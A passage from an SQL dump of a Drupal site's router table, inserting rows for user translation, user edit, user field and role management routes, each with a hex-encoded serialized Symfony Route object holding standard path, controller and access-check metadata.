('entity.user.content_translation_add', '/user/{user}/translations/add/{source}/{target}', '/user/%/translations/add', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f757365722f7b757365727d2f7472616e736c6174696f6e732f6164642f7b736f757263657d2f7b7461726765747d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a37323a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a616464223b733a363a22736f75726365223b4e3b733a363a22746172676574223b4e3b733a363a225f7469746c65223b733a333a22416464223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a393a22757365722e76696577223b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22637265617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a333a7b733a363a22736f75726365223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a363a22746172676574223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a2275736572223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a75736572223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a343a2275736572223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39343a227b5e2f757365722f283f503c757365723e5b5e2f5d2b2b292f7472616e736c6174696f6e732f616464283f3a2f283f503c736f757263653e5b5e2f5d2b2b29283f3a2f283f503c7461726765743e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22746172676574223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a363a22736f75726365223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31373a222f7472616e736c6174696f6e732f616464223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2275736572223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a343a2275736572223b693a313b733a363a22736f75726365223b693a323b733a363a22746172676574223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32343a222f757365722f252f7472616e736c6174696f6e732f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.user.content_translation_delete', '/user/{user}/translations/delete/{language}', '/user/%/translations/delete', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34333a222f757365722f7b757365727d2f7472616e736c6174696f6e732f64656c6574652f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a33333a22757365722e636f6e74656e745f7472616e736c6174696f6e5f64656c6574696f6e223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a363a2244656c657465223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a2264656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a2275736572223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a75736572223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2275736572223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37353a227b5e2f757365722f283f503c757365723e5b5e2f5d2b2b292f7472616e736c6174696f6e732f64656c657465283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f7472616e736c6174696f6e732f64656c657465223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2275736572223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a2275736572223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32373a222f757365722f252f7472616e736c6174696f6e732f64656c657465223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.user.content_translation_edit', '/user/{user}/translations/edit/{language}', '/user/%/translations/edit', 11, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34313a222f757365722f7b757365727d2f7472616e736c6174696f6e732f656469742f7b6c616e67756167657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a37333a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a65646974223b733a383a226c616e6775616765223b4e3b733a363a225f7469746c65223b733a343a2245646974223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33343a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6d616e616765223b733a363a22757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a323a7b733a383a226c616e6775616765223b613a323a7b733a343a2274797065223b733a383a226c616e6775616765223b733a393a22636f6e766572746572223b733a34383a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e6c616e67756167655f636f6e766572746572223b7d733a343a2275736572223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a75736572223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33333a22636f6e74656e745f7472616e736c6174696f6e2e6d616e6167655f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2275736572223b693a313b733a383a226c616e6775616765223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f757365722f283f503c757365723e5b5e2f5d2b2b292f7472616e736c6174696f6e732f65646974283f3a2f283f503c6c616e67756167653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e6775616765223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31383a222f7472616e736c6174696f6e732f65646974223b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2275736572223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a2275736572223b693a313b733a383a226c616e6775616765223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31313b733a31343a227061747465726e4f75746c696e65223b733a32353a222f757365722f252f7472616e736c6174696f6e732f65646974223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.user.content_translation_overview', '/user/{user}/translations', '/user/%/translations', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f757365722f7b757365727d2f7472616e736c6174696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37373a225c44727570616c5c636f6e74656e745f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e74656e745472616e736c6174696f6e436f6e74726f6c6c65723a3a6f76657276696577223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a393a22757365722e76696577223b733a33363a225f6163636573735f636f6e74656e745f7472616e736c6174696f6e5f6f76657276696577223b733a343a2275736572223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2275736572223b613a333a7b733a343a2274797065223b733a31313a22656e746974793a75736572223b733a32303a226c6f61645f6c61746573745f7265766973696f6e223b623a303b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b693a313b733a33353a22636f6e74656e745f7472616e736c6174696f6e2e6f766572766965775f616363657373223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2275736572223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34323a227b5e2f757365722f283f503c757365723e5b5e2f5d2b2b292f7472616e736c6174696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f7472616e736c6174696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2275736572223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2275736572223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a32303a222f757365722f252f7472616e736c6174696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.user.edit_form', '/user/{user}/edit', '/user/%/edit', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31373a222f757365722f7b757365727d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31323a22757365722e64656661756c74223b733a31353a225f7469746c655f63616c6c6261636b223b733a34383a2244727570616c5c757365725c436f6e74726f6c6c65725c55736572436f6e74726f6c6c65723a3a757365725469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a343a2275736572223b733a333a225c642b223b733a31343a225f656e746974795f616363657373223b733a31313a22757365722e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a2275736572223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a75736572223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a2275736572223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33313a227b5e2f757365722f283f503c757365723e5c642b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a343a2275736572223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f75736572223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a2275736572223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31323a222f757365722f252f65646974223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.user.field_ui_fields', '/admin/config/people/accounts/fields', '/admin/config/people/accounts/fields', 31, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31313a225f636f6e74726f6c6c6572223b733a36323a225c44727570616c5c6669656c645f75695c436f6e74726f6c6c65725c4669656c64436f6e6669674c697374436f6e74726f6c6c65723a3a6c697374696e67223b733a363a225f7469746c65223b733a31333a224d616e616765206669656c6473223b733a31343a22656e746974795f747970655f6964223b733a343a2275736572223b733a363a2262756e646c65223b733a343a2275736572223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e69737465722075736572206669656c6473223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a393a225f6669656c645f7569223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33313b733a31343a227061747465726e4f75746c696e65223b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.user_role.collection', '/admin/people/roles', '/admin/people/roles', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31393a222f61646d696e2f70656f706c652f726f6c6573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a393a22757365725f726f6c65223b733a363a225f7469746c65223b733a353a22526f6c6573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32363a227b5e2f61646d696e2f70656f706c652f726f6c6573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31393a222f61646d696e2f70656f706c652f726f6c6573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a31393a222f61646d696e2f70656f706c652f726f6c6573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.user_role.config_translation_overview', '/admin/people/roles/manage/{user_role}/translate', '/admin/people/roles/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34383a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a393a22757365725f726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36353a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.user_role.delete_form', '/admin/people/roles/manage/{user_role}/delete', '/admin/people/roles/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34353a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a22757365725f726f6c652e64656c657465223b733a363a225f7469746c65223b733a31313a2244656c65746520726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31363a22757365725f726f6c652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36323a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33353a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.user_role.edit_form', '/admin/people/roles/manage/{user_role}', '/admin/people/roles/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33383a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a22757365725f726f6c652e64656661756c74223b733a363a225f7469746c65223b733a393a224564697420726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31363a22757365725f726f6c652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35353a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a22757365725f726f6c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
